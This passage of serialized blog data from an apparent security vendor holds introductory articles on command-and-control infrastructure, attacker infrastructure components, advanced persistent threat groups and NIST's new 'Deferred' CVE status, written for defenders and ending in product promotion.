For example, they may use it to coordinate larger attacks, like:",[22,44210,44211,44214,44217],{},[25,44212,44213],{},"Supply chain attacks",[25,44215,44216],{},"Watering hole attacks targeting less secure endpoints",[25,44218,44219],{},"Deploying rootkits",[18,44221,44222],{},"The C2 infrastructure’s ability to evade detection enables the attackers to strategically navigate and exploit the target network.",[993,44224,44226],{"id":44225},"evasion-techniques","Evasion Techniques",[18,44228,44229],{},"While not a specific “attack phase,” threat actors engage in ongoing activities to maintain stealth, including:",[22,44231,44232,44235,44238],{},[25,44233,44234],{},"Domain hopping by using dynamic domain generation algorithms to create numerous domain names and complicate tracking efforts",[25,44236,44237],{},"Encryption to make any data transfers difficult for security teams to view and mitigate",[25,44239,44240],{},"Transferring traffic through legitimate services to blend into normal network activities",[61,44242,44244],{"id":44243},"common-types-of-c2-malware","Common Types of C2 Malware",[18,44246,44247],{},"Every C2-driven attack incorporates some kind of malicious code that enables the attackers to control the compromised systems. 
Some of the more common malware variants include:",[22,44249,44250,44256,44262,44268],{},[25,44251,44252,44255],{},[295,44253,44254],{},"Remote Access Trojans (RATs)",": persistent access to target networks enabling attackers to hide in malicious software like email attachments.",[25,44257,44258,44261],{},[295,44259,44260],{},"Botnets",": networks of infected machines used in malicious activities such as sending spam emails or launching attacks.",[25,44263,44264,44267],{},[295,44265,44266],{},"Keyloggers",": capturing sensitive information, like passwords or financial documents, and sending it back to the control server.",[25,44269,44270,44273],{},[295,44271,44272],{},"Backdoors",": providing unauthorized access to systems, allowing additional malware to spread faster.",[61,44275,44277],{"id":44276},"how-to-detect-and-mitigate-c2-attack-risks","How to Detect and Mitigate C2 Attack Risks",[18,44279,44280],{},"While attackers use C2-driven attacks and the associated infrastructure to evade detection, security teams can take some steps to help identify potential compromise and engage in proactive risk mitigation strategies.",[18,44282,44283],{},"To reduce the likelihood that threat actors can successfully deploy a C2-driven attack, organizations can implement the following risk mitigation controls:",[22,44285,44286,44292,44298,44304],{},[25,44287,44288,44291],{},[295,44289,44290],{},"Patch vulnerabilities:"," scan for security weaknesses in operating systems, software, and firmware and apply security updates in a timely manner.",[25,44293,44294,44297],{},[295,44295,44296],{},"Limit user access",": apply the principle of least privilege across all user access with role-based access controls that limit user access to only resources necessary for completing job functions.",[25,44299,44300,44303],{},[295,44301,44302],{},"Monitor network traffic",": create network traffic baselines and monitor for abnormal activity that can indicate potential data exfiltration or remote 
command execution, like outbound connections to known malicious domains or IP addresses.",[25,44305,44306,44309],{},[295,44307,44308],{},"Incorporate threat intelligence",": leverage insight into actual attacker behavior to identify targeted technologies or vulnerabilities to prioritize monitoring and patching across them.",[18,44311,44312],{},"With VulnCheck’s Exploit Intelligence and IP Intelligence, security teams have access to the most recent threat intelligence about how attackers are acting in the real world. The VulnCheck platform offers live tracking of threat actors’ C2 infrastructures so that security teams can implement dynamic block lists that proactively remediate attack risk.",[18,44314,44315],{},"With the industry’s largest collection of exploit proof of concept code and real-world exploitation data, organizations can prioritize their vulnerability remediation activities more effectively and reduce the likelihood that threat actors can successfully deploy a C2-driven attack.",[44317,44318],"link-cta",{"to":13111},{"title":219,"searchDepth":220,"depth":220,"links":44320},[44321,44322,44323,44324,44337,44338],{"id":44003,"depth":220,"text":44004},{"id":44032,"depth":220,"text":44033},{"id":44071,"depth":220,"text":44072},{"id":44092,"depth":220,"text":44093,"children":44325},[44326,44327,44328,44329,44330,44331,44332,44333,44334,44335,44336],{"id":44099,"depth":1266,"text":44100},{"id":44106,"depth":1266,"text":44107},{"id":44127,"depth":1266,"text":44128},{"id":44134,"depth":1266,"text":44135},{"id":44138,"depth":1266,"text":44139},{"id":44162,"depth":1266,"text":44163},{"id":44166,"depth":1266,"text":44167},{"id":44173,"depth":1266,"text":44174},{"id":44180,"depth":1266,"text":44181},{"id":44204,"depth":1266,"text":44205},{"id":44225,"depth":1266,"text":44226},{"id":44243,"depth":220,"text":44244},{"id":44276,"depth":220,"text":44277},"2025-04-21","Exploit Intel 101 - Understanding Command & Control (C2) 
Infrastructure",{"slug":44342},"understanding-command-control-infrastructure","\u002Fblog\u002Funderstanding-command-control-infrastructure",{"title":43979,"description":44340},{"title":41489,"color":41490,"icon":41491},"blog\u002Funderstanding-command-control-infrastructure",[41494],"OhlYfFj88J1nCd86vU0Jdgf-dDhYt1Uk-x8Ghewrl9A",{"id":44350,"title":44351,"articles":7,"authors":44352,"body":44354,"date":44564,"description":44565,"extension":234,"image":7,"link":7,"meta":44566,"navigation":237,"path":44568,"seo":44569,"series":44570,"stem":44571,"subtype":7,"tags":44572,"__hash__":44573},"blog\u002Fblog\u002Fattacker-infrastructure.md","Attacker Infrastructure",[44353],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":44355,"toc":44550},[44356,44359,44373,44376,44379,44382,44386,44389,44409,44413,44416,44420,44423,44437,44440,44444,44447,44451,44454,44457,44489,44493,44496,44500,44503,44507,44510,44514,44517,44528,44532,44535,44539,44542,44545,44548],[18,44357,44358],{},"This knowledgebase article will support a fundamental understanding of:",[22,44360,44361,44364,44367,44370],{},[25,44362,44363],{},"A fundamental understanding of Attacker Infrastructure and its key components",[25,44365,44366],{},"What the meaning of Command and Control (C2) infrastructure is",[25,44368,44369],{},"Examples of attacks using different pieces of Attacker Infrastructure \u002F C2",[25,44371,44372],{},"How VulnCheck’s IP Intelligence solution can support teams",[18,44374,44375],{},"While the image of a random man in a black hoodie sitting at a computer with dark green code remains pervasive, the reality of modern cyberattacks is that they parallel legitimate business models. Just as an organization maintains a digital infrastructure and associated technology stack, so do cyber attackers.",[18,44377,44378],{},"Attacker infrastructure includes a wide variety of technologies that mirror the ones everyday IT teams use. 
From command and control (C2) to proxies, attackers use a collection of components to deploy attacks and steal data. Often, companies and attackers use similar technologies with the primary difference being underlying intent.",[18,44380,44381],{},"With insight into attacker infrastructure, security teams can detect signs of compromise and mitigate risk more effectively.",[61,44383,44385],{"id":44384},"what-is-attacker-infrastructure","What is Attacker Infrastructure?",[18,44387,44388],{},"The attacker infrastructure consists of the hardware, software, and cloud assets that malicious actors use to maintain operations. Malicious actors use different technologies to accomplish each phase of an attack. At minimum, attackers incorporate hardware and software components that enable them to:",[22,44390,44391,44394,44397,44400,44403,44406],{},[25,44392,44393],{},"Obfuscate their activities",[25,44395,44396],{},"Send phishing emails",[25,44398,44399],{},"Redirect users and network traffic",[25,44401,44402],{},"Deliver payloads",[25,44404,44405],{},"Remotely control the intended targets",[25,44407,44408],{},"Protect communications between the cybercriminal group and the rest of the infrastructure",[61,44410,44412],{"id":44411},"what-are-the-key-components-of-attacker-infrastructure","What Are the Key Components of Attacker Infrastructure?",[18,44414,44415],{},"To implement appropriate risk mitigation strategies, security teams need to understand what tools and infrastructure attackers use. As attackers often have a complex, comprehensive technology stack, defenders need insight into how each component may interact with their environment. Common infrastructure components include:",[993,44417,44419],{"id":44418},"command-and-control-c2-servers","Command and Control (C2) Servers",[18,44421,44422],{},"Attackers use C2 servers to communicate with their targets, deliver instructions and harvest data. 
C2 servers come in two forms:",[22,44424,44425,44431],{},[25,44426,44427,44430],{},[295,44428,44429],{},"Centralized C2 Networks",": a hub that attackers use to manage malware and monitor compromised devices so they can issue commands, download additional malware, or extract data from victims.",[25,44432,44433,44436],{},[295,44434,44435],{},"Peer-to-Peer C2 Networks",": a decentralized model that uses a collection of compromised devices operating as both client and server that communicate to execute commands and exchange data.",[18,44438,44439],{},"Unlike the centralized C2 network, a peer-to-peer network can keep functioning after removing individual nodes, making it more resilient to interventions from law enforcement or security teams looking to disrupt the malicious C2 network.",[993,44441,44443],{"id":44442},"domain-name-system-dns","Domain Name System (DNS)",[18,44445,44446],{},"DNS translates an IP address into a human readable name. Malicious actors often use domains, domain names, and subdomains as part of phishing and other attacks in order to mask their infrastructure and fool unsuspecting users. Depending on the attackers’ sophistication and plans, they can either hijack an existing DNS server to prevent security teams from tracing the traffic to them, or configure their own servers so they can control the C2 traffic.",[993,44448,44450],{"id":44449},"proxies","Proxies",[18,44452,44453],{},"Proxies route traffic through multiple network nodes making it difficult for defenders to track and easier for malicious actors to hide their identity and location. 
Proxies not only add layers of obfuscation, but also allow threat actors to change their underlying IP addresses more easily, further helping them to avoid detection.",[18,44455,44456],{},"Some examples of how attackers use proxies listed by MITRE ATT&CK include:",[22,44458,44459,44469,44479],{},[25,44460,44461,44468],{},[295,44462,44463],{},[47,44464,44467],{"href":44465,"rel":44466},"https:\u002F\u002Fattack.mitre.org\u002Ftechniques\u002FT1090\u002F001\u002F",[51],"Internal proxy",": used to control traffic between nodes within a compromised network.",[25,44470,44471,44478],{},[295,44472,44473],{},[47,44474,44477],{"href":44475,"rel":44476},"https:\u002F\u002Fattack.mitre.org\u002Ftechniques\u002FT1090\u002F002\u002F",[51],"External proxy",": using port redirectors and other techniques to hide where the C2 traffic goes.",[25,44480,44481,44488],{},[295,44482,44483],{},[47,44484,44487],{"href":44485,"rel":44486},"https:\u002F\u002Fattack.mitre.org\u002Ftechniques\u002FT1090\u002F003\u002F",[51],"Multi-hop proxy",": transporting C2 traffic through multiple devices to create a multi-hop proxy chain.",[993,44490,44492],{"id":44491},"redirectors","Redirectors",[18,44494,44495],{},"Redirectors divert communications that the target sends or receives so defenders have a harder time tracing and shutting down the communications. Malicious actors can often use redirectors for ongoing operational resilience and persistence: If security teams identify a piece of attacker infrastructure, then the attackers can take down the compromised device and redirect to new infrastructure, continuing their operations unhindered.",[993,44497,44499],{"id":44498},"relays","Relays",[18,44501,44502],{},"Relays are tools that attackers use to intercept communications, typically during a man-in-the-middle (MitM) attack. 
Attackers can use them in multiple ways, such as poisoning multicast protocols like mDNS, NBT-NS, or LLMNR, or to intercept and manipulate SMB, HTTP, or RDP traffic.",[993,44504,44506],{"id":44505},"serverless","Serverless",[18,44508,44509],{},"Malicious actors can purchase or configure serverless infrastructure from traditional cloud providers so that security teams have a hard time tracing their activity. Since the functions come from cloud provider subdomains, security teams have a difficult time separating the malicious traffic from the legitimate traffic.",[993,44511,44513],{"id":44512},"virtual-private-network-vpn","Virtual Private Network (VPN)",[18,44515,44516],{},"VPNs encrypt data-in-transit to prevent unauthorized access. VPNs enable attackers to hide in several different ways, including:",[22,44518,44519,44522,44525],{},[25,44520,44521],{},"Making exfiltrated data unusable to anyone else",[25,44523,44524],{},"Masking their IP addresses to make them harder to locate",[25,44526,44527],{},"Securing communications between the C2 and the attacker base",[993,44529,44531],{"id":44530},"web-services","Web Services",[18,44533,44534],{},"Attackers may use various web services to accomplish their objectives. Often, they use the same services that businesses use, like Google and GitHub, so that they can evade detection by looking like normal incoming and outgoing traffic.",[61,44536,44538],{"id":44537},"how-does-ip-intelligence-mitigate-risks-associated-with-attacker-infrastructure","How Does IP Intelligence Mitigate Risks Associated with Attacker Infrastructure?",[18,44540,44541],{},"IP intelligence helps security teams battle against attacker IP address and domain manipulation. Organizations often implement security controls that rely on blocklists and allowlists. 
For example, firewall rules define the IP addresses that users can communicate with and protective DNS tools block users from accessing malicious websites.",[18,44543,44544],{},"However, DNS fluxing and IP churn can make these lists outdated. With IP intelligence, security teams can keep pace with attackers and block their infrastructures. VulnCheck IP Intelligence provides live tracking of attacker C2 infrastructures so that security teams can implement dynamic block lists. Additionally, VulnCheck IP Intelligence includes data from the past 3, 10, 30, and 90 days so that security teams can hunt for historic IP data, even as attackers continuously change the IP addresses to evade detection.",[18,44546,44547],{},"Since VulnCheck is exclusively threat focused, our IP Intelligence makes it easier to block attacker infrastructure and rapidly identify vulnerable systems.",[44317,44549],{"to":13111},{"title":219,"searchDepth":220,"depth":220,"links":44551},[44552,44553,44563],{"id":44384,"depth":220,"text":44385},{"id":44411,"depth":220,"text":44412,"children":44554},[44555,44556,44557,44558,44559,44560,44561,44562],{"id":44418,"depth":1266,"text":44419},{"id":44442,"depth":1266,"text":44443},{"id":44449,"depth":1266,"text":44450},{"id":44491,"depth":1266,"text":44492},{"id":44498,"depth":1266,"text":44499},{"id":44505,"depth":1266,"text":44506},{"id":44512,"depth":1266,"text":44513},{"id":44530,"depth":1266,"text":44531},{"id":44537,"depth":220,"text":44538},"2025-04-18","Exploit Intel 101 - Attacker 
Infrastructure",{"slug":44567},"attacker-infrastructure","\u002Fblog\u002Fattacker-infrastructure",{"title":44351,"description":44565},{"title":41489,"color":41490,"icon":41491},"blog\u002Fattacker-infrastructure",[41494],"25ukwgMjkvKxKi8TCbq9y7q7NpWoP0hbePN9wBE3tNI",{"id":44575,"title":44576,"articles":7,"authors":44577,"body":44579,"date":44564,"description":44948,"extension":234,"image":7,"link":7,"meta":44949,"navigation":237,"path":44951,"seo":44952,"series":44953,"stem":44954,"subtype":7,"tags":44955,"__hash__":44956},"blog\u002Fblog\u002Funderstanding-apts.md","Understanding APTs",[44578],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":44580,"toc":44928},[44581,44583,44597,44600,44604,44607,44610,44627,44631,44634,44638,44641,44644,44648,44651,44664,44667,44671,44674,44678,44681,44685,44694,44698,44701,44712,44716,44719,44722,44742,44745,44771,44775,44787,44854,44858,44861,44865,44868,44879,44883,44897,44901,44909,44913,44916,44920,44923,44926],[18,44582,44358],{},[22,44584,44585,44588,44591,44594],{},[25,44586,44587],{},"A fundamental understanding of Advanced Persistent Threats (APTs)",[25,44589,44590],{},"How APTs work and how they are applied by threat actors",[25,44592,44593],{},"Examples of APTs and the threat actors associated with them",[25,44595,44596],{},"How APTs leverage exploited vulnerabilities",[18,44598,44599],{},"Advanced Persistent Threats (APTs) are ongoing attacks where malicious actors gain unauthorized access to systems then linger for an extended period of time. They prioritize stealth to evade detection so that they can remain in the compromised system longer, enabling them to do more damage and exfiltrate more data. 
By understanding what an APT is and how attackers can exploit system vulnerabilities to gain initial access, organizations can implement risk mitigation strategies.",[61,44601,44603],{"id":44602},"what-is-an-advanced-persistent-threat-apt","What is an advanced persistent threat (APT)?",[18,44605,44606],{},"An advanced persistent threat (APT) is a prolonged and strategic cyber attack by highly skilled threat actors. Attackers start by gaining unauthorized access to the target network so they can exfiltrate data over an extended period. APTs require planning since they often use sophisticated techniques.",[18,44608,44609],{},"When categorizing an attack as an APT, some typical features include:",[22,44611,44612,44615,44618,44621,44624],{},[25,44613,44614],{},"Maintaining access for a long time, sometimes years",[25,44616,44617],{},"Using advanced tools and techniques, like zero-day exploits or credential harvesting",[25,44619,44620],{},"Blending into legitimate network traffic to avoid detection",[25,44622,44623],{},"Focusing on high-value targets, like government agencies, defense contractors, or enterprises",[25,44625,44626],{},"Stealing data, like intellectual property, rather than causing direct damage",[61,44628,44630],{"id":44629},"what-are-the-stages-of-an-apt-attack","What are the Stages of an APT attack?",[18,44632,44633],{},"APTs are structured and stealthy operations that seek to compromise critical networks and their data. Across each step of the attack, security teams have an opportunity to thwart the malicious actors.",[993,44635,44637],{"id":44636},"reconnaissance-and-initial-access","Reconnaissance and initial access",[18,44639,44640],{},"During the reconnaissance phase, the attackers typically look for vulnerabilities that they can use to gain unauthorized access. These vulnerabilities can be in software, hardware, and firmware. 
Additionally, in cloud-native environments, attackers can use stolen or leaked credentials as a way to gain this initial access.",[18,44642,44643],{},"Unlike broader attacks that take a spray and pray approach, APTs use tailored tools or take a targeted focus, like understanding an organization’s technology stack to look for weaknesses or crafting specialized social engineering attacks.",[993,44645,44647],{"id":44646},"establish-a-foothold","Establish a foothold",[18,44649,44650],{},"Attackers use various techniques to maintain access so they can continue to operate while evading detection, including using:",[22,44652,44653,44658],{},[25,44654,44655,44657],{},[295,44656,44272],{},": using existing vulnerabilities to maintain an unauthorized access point",[25,44659,44660,44663],{},[295,44661,44662],{},"Rootkits",": malicious software on machines that allows attackers to perform remote actions or steal data",[18,44665,44666],{},"The threat actors create the additional entry points so that they can access the compromised system if the organization remediates the initial attack vector.",[993,44668,44670],{"id":44669},"escalate-privileges","Escalate privileges",[18,44672,44673],{},"After creating their own entry points, attackers explore the organization’s networks to identify critical assets, like databases. During this process, they gather additional credentials so that they can gain privileged access that allows them to target high-value assets and deploy advanced malware to disguise their activity.",[993,44675,44677],{"id":44676},"move-laterally","Move laterally",[18,44679,44680],{},"Lateral movement is when the attackers expand their control by accessing different infrastructure components, like workstations or servers. 
As with the earlier stages, they often deploy additional entry points using backdoors or malware so they can continue to explore networks and exploit additional vulnerabilities.",[993,44682,44684],{"id":44683},"exfiltrate-data","Exfiltrate data",[18,44686,44687,44688,44693],{},"Once the attackers reach their targets, they begin to steal sensitive data or intellectual property, sending it to their ",[47,44689,44692],{"href":44690,"rel":44691},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Factive-c2-servers",[51],"command and control (C2) servers."," To hide exfiltration, they may deploy additional attacks to distract defenders, like using ransomware or a Distributed Denial of Service (DDoS) attack.",[993,44695,44697],{"id":44696},"complete-objectives","Complete objectives",[18,44699,44700],{},"When attackers have completed their objectives or worry about being caught, they exit the system and remove evidence of their existence. These exit strategies can include:",[22,44702,44703,44706,44709],{},[25,44704,44705],{},"Erasing log data",[25,44707,44708],{},"Removing backdoors or malware",[25,44710,44711],{},"Manipulating audit trails",[61,44713,44715],{"id":44714},"what-are-the-main-motives-and-targets-of-an-apt-attack","What are the main motives and targets of an APT attack?",[18,44717,44718],{},"Unlike conventional cyber attacks, APT actors, who are often affiliated with nation-state groups, focus on espionage rather than network destruction.",[18,44720,44721],{},"The main motives underlying APT attacks include:",[22,44723,44724,44730,44736],{},[25,44725,44726,44729],{},[295,44727,44728],{},"Intellectual Property Theft",": Stealing confidential data, such as product designs or business strategies.",[25,44731,44732,44735],{},[295,44733,44734],{},"Surveillance",": Gathering intelligence on competitors or foreign entities.",[25,44737,44738,44741],{},[295,44739,44740],{},"Economic Advantage",": Undermining a competitor’s business operations through unauthorized 
access.",[18,44743,44744],{},"Since APT attacks require highly technical skills, they often target organizations and industries that create, maintain, or store sensitive data, including:",[22,44746,44747,44753,44759,44765],{},[25,44748,44749,44752],{},[295,44750,44751],{},"Large Corporations",": repository of valuable data.",[25,44754,44755,44758],{},[295,44756,44757],{},"Defense and Aerospace Industries",": access to sensitive defense technologies.",[25,44760,44761,44764],{},[295,44762,44763],{},"Government Agencies",": strategic intelligence on policy and diplomatic matters.",[25,44766,44767,44770],{},[295,44768,44769],{},"Critical Infrastructures",": data about energy grids and financial systems.",[61,44772,44774],{"id":44773},"what-are-examples-of-apt-groups","What are examples of APT Groups?",[18,44776,44777,44778,44783,44784,44786],{},"APT groups are the cybercriminal organizations responsible for deploying the attack. An APT group may claim responsibility for an attack or be categorized by external parties, like ",[47,44779,44782],{"href":44780,"rel":44781},"https:\u002F\u002Fattack.mitre.org\u002Fgroups\u002F",[51],"MITRE ATT&CK,"," because a set of attacks uses similar tactics, techniques, and procedures (TTPs).",[1823,44785],{},"\nSome examples of these APT groups include:",[22,44788,44789,44800,44806,44812,44818,44824,44830,44836,44842,44848],{},[25,44790,44791,10515,44794,44799],{},[295,44792,44793],{},"APT31:",[47,44795,44798],{"href":44796,"rel":44797},"https:\u002F\u002Fcloud.google.com\u002Fsecurity\u002Fresources\u002Finsights\u002Fapt-groups",[51],"suspected Chinese cyber espionage actor"," that exploited vulnerabilities in Java and Adobe Flash to compromise environments when targeting governmental entities, financial services, defense contractors, engineering, telecommunications, media, and insurance companies",[25,44801,44802,44805],{},[295,44803,44804],{},"APT37",": North Korean state-sponsored cyber espionage group that exploits known 
vulnerabilities in Hangul Word Processor and Adobe Flash and zero-day vulnerabilities when targeting chemical, electronics, manufacturing, automotive, and healthcare organizations across South Korea, Japan, Vietnam, and the Middle East",[25,44807,44808,44811],{},[295,44809,44810],{},"CyberAv3ngers",": suspected Iranian Government Islamic Revolutionary Guard Corps (IRGC)-affiliated group that targeted programmable logic controllers (PLCs) in 2023",[25,44813,44814,44817],{},[295,44815,44816],{},"Inception:"," cyber espionage group targeting various industries and governmental entities across Russia, the US, and Europe",[25,44819,44820,44823],{},[295,44821,44822],{},"Machete",": suspected Spanish-speaking cyber espionage group that focuses on Latin America, targeting high-profile organizations like government entities, intelligence services, military units, telecommunications companies, and power companies",[25,44825,44826,44829],{},[295,44827,44828],{},"Metador",": cyber espionage group targeting telecommunication companies, internet service providers (ISPs) and universities across the Middle East and Africa since 2022",[25,44831,44832,44835],{},[295,44833,44834],{},"Moonstone Sleet",": cyber espionage operation using fake companies and personas to deploy social engineering attacks since 2023",[25,44837,44838,44841],{},[295,44839,44840],{},"Patchwork",": cyber espionage group targeting diplomatic entities, government agencies, and think tanks since 2015",[25,44843,44844,44847],{},[295,44845,44846],{},"RedCurl",": suspected Russian-speaking threat actor engaging in corporate espionage against travel agencies, insurance companies, and banks across Ukraine, Canada, and Kingdom",[25,44849,44850,44853],{},[295,44851,44852],{},"Thrip",": espionage group that uses custom malware and “living off the land” techniques when targeting satellite communications, telecommunications, and defense contractor companies across the US and Southeast 
Asia",[61,44855,44857],{"id":44856},"how-apt-groups-use-vulnerabilities-to-gain-initial-access","How APT Groups Use Vulnerabilities to Gain Initial Access",[18,44859,44860],{},"Unlike financially motivated cybercriminals who often purchase exploits on the dark web, APT groups often have the skills, experience, and advanced tools necessary to deploy sophisticated techniques.",[993,44862,44864],{"id":44863},"spear-phishing-attacks","Spear-phishing attacks",[18,44866,44867],{},"Spear-phishing attacks send malicious emails to specific targets, tricking them into clicking on a malicious link. Attackers can use this process to steal session tokens, which enables them to compromise applications that have broken access control vulnerabilities arising from:",[22,44869,44870,44873,44876],{},[25,44871,44872],{},"Failure to invalidate stateful session identifiers on the server after users log out",[25,44874,44875],{},"Long-lived stateless JWT tokens that extend an attacker's opportunity to use them",[25,44877,44878],{},"Lack of OAuth standards for revoking long-lived JWTs",[993,44880,44882],{"id":44881},"unpatched-software","Unpatched software",[18,44884,44885,44886,44890,44891,44896],{},"Once attackers know that a vulnerability exists, they look for ways to use it as part of their attacks. For example, in 2024, ",[47,44887,44889],{"href":13143,"rel":44888},[51],"23.6% of known vulnerabilities were exploited"," on or before they were published. 
Additionally, between 2014 and 2023, ",[47,44892,44895],{"href":44893,"rel":44894},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fstate-of-exploitation-a-decade",[51],"attackers exploited 1.1% of vulnerabilities"," listed in VulnCheck’s Known Exploited Vulnerabilities (KEV).",[993,44898,44900],{"id":44899},"zero-day-attacks","Zero-day attacks",[18,44902,44903,44904,59],{},"APT groups are more likely to exploit previously unknown vulnerabilities in zero-day attacks than other cybercriminals because they have the financial, tooling, and skill resources to find these weaknesses. Organizations often need to wait for vendors or security researchers to publish the vulnerabilities, leaving them at risk. In some cases, the vendors may not realize that the vulnerability exists until attackers exploit it. For example, in 2024, VulnCheck offered advance warnings for ",[47,44905,44908],{"href":44906,"rel":44907},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fvulncheck-iai-2024",[51],"nine zero-day vulnerabilities",[993,44910,44912],{"id":44911},"supply-chain-attacks","Supply chain attacks",[18,44914,44915],{},"Every organization uses technologies, which means that a vulnerability in a vendor’s environment can impact its customers. Even more challenging, attackers increasingly target vulnerabilities in the software supply chain as developers use third-party components. Tracing all these components and their dependencies becomes overwhelming, which gives APT groups an opportunity to find and exploit vulnerabilities.",[61,44917,44919],{"id":44918},"understanding-vulnerability-exploits-to-reduce-apt-risks-with-vulncheck","Understanding Vulnerability Exploits to Reduce APT Risks with VulnCheck",[18,44921,44922],{},"VulnCheck Exploit & Vulnerability Intelligence enables you to understand the state of vulnerability exploitation by combining technical vulnerability data with open source intelligence that shows how attackers, like APT groups, are acting in the real world. 
Unlike other vulnerability databases or vulnerability management solutions, VulnCheck includes the latest information about a wider range of vulnerabilities, including those found in open source packages and dependencies and those in mobile, Internet of Things (IoT), and operational technology (OT) devices - and more.",[18,44924,44925],{},"VulnCheck Vulnerability Intelligence provides vulnerability enrichment with insights into vulnerability risk and severity by tracking vendor and government advisories to provide the context you need to prioritize remediation activities.",[44317,44927],{"to":13111},{"title":219,"searchDepth":220,"depth":220,"links":44929},[44930,44931,44939,44940,44941,44947],{"id":44602,"depth":220,"text":44603},{"id":44629,"depth":220,"text":44630,"children":44932},[44933,44934,44935,44936,44937,44938],{"id":44636,"depth":1266,"text":44637},{"id":44646,"depth":1266,"text":44647},{"id":44669,"depth":1266,"text":44670},{"id":44676,"depth":1266,"text":44677},{"id":44683,"depth":1266,"text":44684},{"id":44696,"depth":1266,"text":44697},{"id":44714,"depth":220,"text":44715},{"id":44773,"depth":220,"text":44774},{"id":44856,"depth":220,"text":44857,"children":44942},[44943,44944,44945,44946],{"id":44863,"depth":1266,"text":44864},{"id":44881,"depth":1266,"text":44882},{"id":44899,"depth":1266,"text":44900},{"id":44911,"depth":1266,"text":44912},{"id":44918,"depth":220,"text":44919},"Exploit Intel 101 - Understanding 
APTs",{"slug":44950},"understanding-apts","\u002Fblog\u002Funderstanding-apts",{"title":44576,"description":44948},{"title":41489,"color":41490,"icon":41491},"blog\u002Funderstanding-apts",[41494],"rNO-PnMPybXx6l841aWevV3H_wpOp_jdTYJFkyqhTn0",{"id":44958,"title":44959,"articles":7,"authors":44960,"body":44966,"date":45079,"description":45080,"extension":234,"image":7,"link":7,"meta":45081,"navigation":237,"path":45083,"seo":45084,"series":7,"stem":45085,"subtype":7,"tags":45086,"__hash__":45088},"blog\u002Fblog\u002Fnist-nvd-deferred.md","NIST’s New Deferred CVE Status: What It Means for Defenders",[44961],{"name":44962,"avatar":44963,"link":44964,"linkName":44965},"Tony Wenzel","https:\u002F\u002Fca.slack-edge.com\u002FT02P16KHNRY-U06FBQX2YHF-d3d608882a38-512","https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Fawenzel\u002F","in\u002Fawenzel\u002F",{"type":15,"value":44967,"toc":45072},[44968,44974,44981,44986,44989,44993,44996,44999,45003,45006,45009,45041,45045,45048,45051,45055,45058,45060,45063,45066],[18,44969,44970],{},[68,44971],{"alt":44972,"src":44973,"width":28205},"NIST NVD Deferred","\u002Fblog\u002Fnist-nvd-deferred\u002Fnist-nvd-deferred.png",[18,44975,44976,44977,44980],{},"The National Institute of Standards and Technology (NIST) recently made a significant update to the National Vulnerability Database (NVD): the introduction of a new CVE status called ",[295,44978,44979],{},"“Deferred.”"," This status has been applied to over 80,000 CVEs and we expect this to apply to over 95,000 CVEs over the next few days, and according to NIST:",[43656,44982,44983],{"author":37514},[18,44984,44985],{},"We are assigning this status to older CVEs to indicate that we do not plan to prioritize updating NVD enrichment or initial NVD enrichment data due to the CVE’s age.",[18,44987,44988],{},"While this update may help NIST better allocate its limited resources, it introduces new risk to organizations that rely on the NVD as their primary source of vulnerability 
intelligence.",[61,44990,44992],{"id":44991},"what-does-deferred-really-mean-for-security-teams","What Does “Deferred” Really Mean for Security Teams?",[18,44994,44995],{},"On paper, “Deferred” implies lower urgency—but in reality, the risks tied to these CVEs haven’t disappeared. In fact, older vulnerabilities are often recycled and reused in active campaigns by both opportunistic and sophisticated threat actors.",[18,44997,44998],{},"The “Deferred” label doesn’t mean these vulnerabilities are safe to ignore. It simply means they’re no longer being enriched with updated metadata by the NVD. That includes vital details like metrics, affected products, exploit information, and other intelligence.",[61,45000,45002],{"id":45001},"at-vulncheck-we-dont-defer-risk","At VulnCheck, We Don’t Defer Risk",[18,45004,45005],{},"VulnCheck treats every CVE as a forever-day, because we know exploitation doesn’t adhere to timelines or maintenance cycles. Our platform continues to monitor, enrich, and prioritize all CVEs—regardless of their status in the NVD.",[18,45007,45008],{},"Here’s how we do it:",[22,45010,45011,45017,45023,45029,45035],{},[25,45012,45013,45016],{},[295,45014,45015],{},"Autonomous Enrichment",": We continuously collect and apply new evidence of in-the-wild exploitation, new exploit discoveries, and related IOCs.",[25,45018,45019,45022],{},[295,45020,45021],{},"Threat Actor Attribution",": Our intelligence maps CVEs to real-world adversaries and campaigns, helping prioritize what matters most to your organization and deprioritize the things that don’t.",[25,45024,45025,45028],{},[295,45026,45027],{},"Exploit Discovery",": VulnCheck identifies new exploit code and activity faster than traditional feeds, often before it spreads widely.",[25,45030,45031,45034],{},[295,45032,45033],{},"Complete CVE Coverage",": No CVE is left behind. 
Whether it’s newly published or deemed “Deferred,” VulnCheck delivers enrichment and context to every vulnerability.",[25,45036,45037,45040],{},[295,45038,45039],{},"Retro CWE Mapping",": NIST NVD only goes as far back as 2007 for mapping CWEs; VulnCheck maps CWEs as far back as 1998.",[61,45042,45044],{"id":45043},"why-this-matters-now","Why This Matters Now",[18,45046,45047],{},"The introduction of the “Deferred” status represents a fundamental shift in how vulnerability data is curated at NIST, and it further highlights the limitations of relying solely on the NVD for vulnerability intelligence.",[18,45049,45050],{},"We’re committed to providing a comprehensive, real-time view of the exploitability landscape—so you’re never blindsided by a supposedly “low-priority” vulnerability that turns out to be actively exploited.",[61,45052,45054],{"id":45053},"stay-ahead-of-the-threat-curve","Stay Ahead of the Threat Curve",[18,45056,45057],{},"If you’re ready to take a more proactive, evidence-based approach to vulnerability intelligence, let’s talk. VulnCheck is purpose-built to help teams detect, prioritize, and respond to real-world threats—no matter how long ago the CVE was published.",[61,45059,202],{"id":201},[18,45061,45062],{},"VulnCheck is helping organizations not just to solve the vulnerability prioritization challenge - we’re working to help equip any product manager, security team and threat hunting team to get faster and more accurate intelligence with infinite efficiency using VulnCheck solutions.",[18,45064,45065],{},"We knew that defenders needed better data, faster across the board, in our industry. So that’s what we deliver to the market. 
